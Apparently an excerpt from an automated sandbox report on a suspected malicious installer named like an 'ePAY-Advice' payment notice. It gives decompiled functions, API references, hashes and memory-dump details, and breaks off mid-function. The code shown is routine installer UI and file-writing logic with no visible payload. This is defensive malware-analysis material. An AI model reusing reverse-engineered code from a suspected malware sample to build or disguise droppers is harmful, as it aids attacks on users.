Opcode Fuzzy Hash: 7d136cfff8c7bf043451e4c65a0ab86a2e72481698e5121a5e115d190c3ec359
Instruction Fuzzy Hash: FF11045180839029FB3226380C40BB76F994F6A760F1900BFE8D2722C2D67C5CA2976E

Uniqueness

Uniqueness Score: -1.00%

Function 00404070 Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404070(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x00404082
0x00404138
0x00000000
0x00404138
0x00404093
0x00404097
0x00000000
0x004040b1
0x004040b1
0x004040ba
0x00000000
0x00000000
0x004040bc
0x004040c8
0x004040cb
0x004040cb
0x004040d1
0x004040d7
0x004040d7
0x004040e3
0x004040e9
0x004040f0
0x004040f3
0x004040f6
0x004040f8
0x004040f8
0x00404100
0x00404106
0x00404106
0x00404110
0x00404115
0x00404118
0x0040411d
0x00404120
0x00404120
0x00404130
0x00404130
0x00000000
0x00404133

APIs

GetWindowLongA.USER32 ref: 0040408D
GetSysColor.USER32(00000000), ref: 004040CB
SetTextColor.GDI32(?,00000000), ref: 004040D7
SetBkMode.GDI32(?,?), ref: 004040E3
GetSysColor.USER32(?), ref: 004040F6
SetBkColor.GDI32(?,?), ref: 00404106
DeleteObject.GDI32(?), ref: 00404120
CreateBrushIndirect.GDI32(?), ref: 0040412A

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c86d0c104538bc307405f6e360d8371e1c040facf7e5af7d22035c6604205aa7
Instruction ID: dc807fd0e826fa60b9ec6720df696095df3ef071cd79e71149a0dd006d979902
Opcode Fuzzy Hash: c86d0c104538bc307405f6e360d8371e1c040facf7e5af7d22035c6604205aa7
Instruction Fuzzy Hash: D021B2709047059BCB309F28DC48A4BBBF8AF81715F048A2AFA96B62E0C334E844CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00405091 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405091(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x422ee4; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4237d4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405F8C(0, _t39, 0x41f4e8, 0x41f4e8, _a4);
					}
					_t26 = lstrlenA(0x41f4e8);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x422ec8, 0x41f4e8);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41f4e8;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41f4e8)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41f4e8, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00405097
0x004050a3
0x004050a6
0x004050ac
0x004050b8
0x004050bb
0x004050be
0x004050c4
0x004050c4
0x004050ca
0x004050d2
0x004050d5
0x004050f2
0x004050f6
0x004050ff
0x004050ff
0x00405109
0x00405112
0x0040511e
0x00405125
0x00405129
0x0040512c
0x0040513f
0x0040514d
0x0040514d
0x00405151
0x00405153
0x00405156
0x00000000
0x00405156
0x004050d7
0x004050df
0x004050e7
0x004050ed
0x00000000
0x004050ed
0x004050e7
0x004050d5
0x00405160

APIs

lstrlenA.KERNEL32(0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
lstrlenA.KERNEL32(004030CC,0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
lstrcatA.KERNEL32(0041F4E8,004030CC,004030CC,0041F4E8,00000000,0040E8C0,00000000), ref: 004050ED
SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 004050FF
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: aecfa0fe9eb69d515e305a3f612982ae456e6964b8eee712a8e2a2356c55715c
Instruction ID: f15a229f4800e2d3be0f1ca7c95b874ac348c5f245d1a9f1eaef2b17b8141df3
Opcode Fuzzy Hash: aecfa0fe9eb69d515e305a3f612982ae456e6964b8eee712a8e2a2356c55715c
Instruction Fuzzy Hash: 67217A71E00518BADF119FA5CD84ADFBFA9EB05354F14807AF904AA291C6789E418FA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040495C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040495C(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x0040496a
0x00404977
0x0040497d
0x004049bb
0x004049bb
0x004049ca
0x004049d1
0x00000000
0x004049d3
0x0040497f
0x0040498e
0x00404996
0x00404999
0x004049ab
0x004049b1
0x004049b8
0x00000000
0x004049b8
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404977
GetMessagePos.USER32 ref: 0040497F
ScreenToClient.USER32 ref: 00404999
SendMessageA.USER32(?,00001111,00000000,?), ref: 004049AB
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049D1

Strings

f, xrefs: 004049AD

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 064635845699c0f4496499246dda67b20ede28c923f9f6f9e3dc5f389f782763
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: 38015271D00219BADB01DBA4DD85BFFBBBCAF55711F10412BBA10B61C0D7B469018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401D9B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401D9B(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402AA9(2);
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				0x40a7e8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40a7f8 = E00402AA9(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				 *0x40a7ff = 1;
				 *0x40a7fc = _t15 & 0x00000001;
				 *0x40a7fd = _t15 & 0x00000002;
				 *0x40a7fe = _t15 & 0x00000004;
				E00405F8C(_t9, _t31, _t33, "Tahoma",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40a7e8);
				_push(_t18);
				_push(_t33);
				E00405EC8();
				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401d9b
0x00401da6
0x00401da8
0x00401db5
0x00401dcc
0x00401dd1
0x00401dde
0x00401de3
0x00401de7
0x00401df2
0x00401df9
0x00401e0b
0x00401e11
0x00401e16
0x00401e20
0x0040257d
0x00401569
0x004028ff
0x0040295a
0x00402966

APIs

GetDC.USER32(?), ref: 00401D9E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
ReleaseDC.USER32 ref: 00401DD1
CreateFontIndirectA.GDI32(0040A7E8), ref: 00401E20

Strings

Tahoma, xrefs: 00401E06

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: b58b48af80338fc5c361f5738cf0c456ed06fa613522f8e9690158e9f906b927
Instruction ID: 85430ec79d7d493a62f5c90f0650e63f0d0faf8675fc45e27afe54df9b067c18
Opcode Fuzzy Hash: b58b48af80338fc5c361f5738cf0c456ed06fa613522f8e9690158e9f906b927
Instruction Fuzzy Hash: CD019271948341AFE7009BB0AE49E9A7FB4DB55305F108479F101BB2E2CA7841909F2F

Uniqueness

Uniqueness Score: -1.00%

Function 00402C7C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C7C(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40a8b8; // 0x4fb4b
					_t11 =  *0x4168c4; // 0x50570
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402c89
0x00402c97
0x00402c9d
0x00402c9d
0x00402cab
0x00402cad
0x00402cb3
0x00402cba
0x00402cbc
0x00402cbc
0x00402cd2
0x00402ce2
0x00402cf4
0x00402cf4
0x00402cfc

APIs

SetTimer.USER32 ref: 00402C97
MulDiv.KERNEL32(0004FB4B,00000064,00050570), ref: 00402CC2
wsprintfA.USER32 ref: 00402CD2
SetWindowTextA.USER32(?,?), ref: 00402CE2
SetDlgItemTextA.USER32 ref: 00402CF4

Strings

verifying installer: %d%%, xrefs: 00402CCC

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: bae99d8ff7e2baad353350c7eaeb5d71397e6bffa89abe4dcb3f34ba705061ab
Instruction ID: 8c289f0fb36a9d27d262e5defce623c0a4e81db89a67886656150a2c4b5e1d8a
Opcode Fuzzy Hash: bae99d8ff7e2baad353350c7eaeb5d71397e6bffa89abe4dcb3f34ba705061ab
Instruction Fuzzy Hash: 00014F70944208BBEF249F60DD09EEE37A9EB04704F008039FA06B92E0D7B99955CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040273C Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040273C(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402ACB(0xfffffff0);
				 *(_t56 - 0x34) = _t23;
				if(E0040596F(_t50) == 0) {
					E00402ACB(0xffffffed);
				}
				E00405ADE(_t50);
				_t26 = E00405B03(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x423718;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040318E(_t45);
						E00403178(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x3c) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x20));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x24)));
							E00402F9C();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x84) =  *_t54;
								E00405ABE( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x84);
							}
							GlobalFree( *(_t56 - 0x3c));
						}
						E00405BAA( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0xc)) = E00402F9C();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x34));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x0040273c
0x0040273e
0x0040274a
0x0040274d
0x00402757
0x0040275b
0x0040275b
0x00402761
0x0040276e
0x00402776
0x00402779
0x0040277f
0x0040278d
0x00402792
0x00402796
0x00402799
0x004027a2
0x004027ae
0x004027b2
0x004027b5
0x004027b7
0x004027ba
0x004027bb
0x004027bc
0x004027bf
0x004027e4
0x004027c6
0x004027cb
0x004027d3
0x004027d9
0x004027de
0x004027de
0x004027eb
0x004027eb
0x004027f8
0x004027fe
0x00402804
0x00402805
0x00402806
0x00402809
0x00402810
0x00402810
0x00402816
0x00402816
0x00402821
0x00402822
0x00402826
0x0040282a
0x00402830
0x00402830
0x00402837
0x0040223d
0x0040295a
0x00402966

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
GlobalFree.KERNEL32 ref: 004027EB
GlobalFree.KERNEL32 ref: 004027FE
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: c115fe47c4504d0bb8b60b0d5f13ce5bdbc82dd966aacea276b53c94d5c3b0c6
Instruction ID: 69dabb1dc5664d4cb3e0aedb1da4cd8560a2ff3041f204a353ec2f52c38cd3f1
Opcode Fuzzy Hash: c115fe47c4504d0bb8b60b0d5f13ce5bdbc82dd966aacea276b53c94d5c3b0c6
Instruction Fuzzy Hash: 7C21BF71C00128BBCF206FA5CE49D9E7A79EF04364F14423AF410762E0C7791D009FA9

Uniqueness

Uniqueness Score: -1.00%

Function 6E16183B Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E6E16183B(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x6e16405c = _a8;
				_t77 = 0;
				 *0x6e164060 = _a16;
				_v12 = 0;
				_v8 = E6E16123B();
				_t90 = E6E1612FE(_t42);
				_t87 = _t85;
				_t81 = E6E16123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E6E16123B();
					_t77 = E6E1612FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E6E161429(_t85, _t90, _t87,  &_v52);
								E6E161266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E6E162EB0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E6E162ED0(_t59, _t83, _t85);
						} else {
							_t48 = E6E162F00(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E6E162D40(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E6E162DF0(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E6E162D00(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
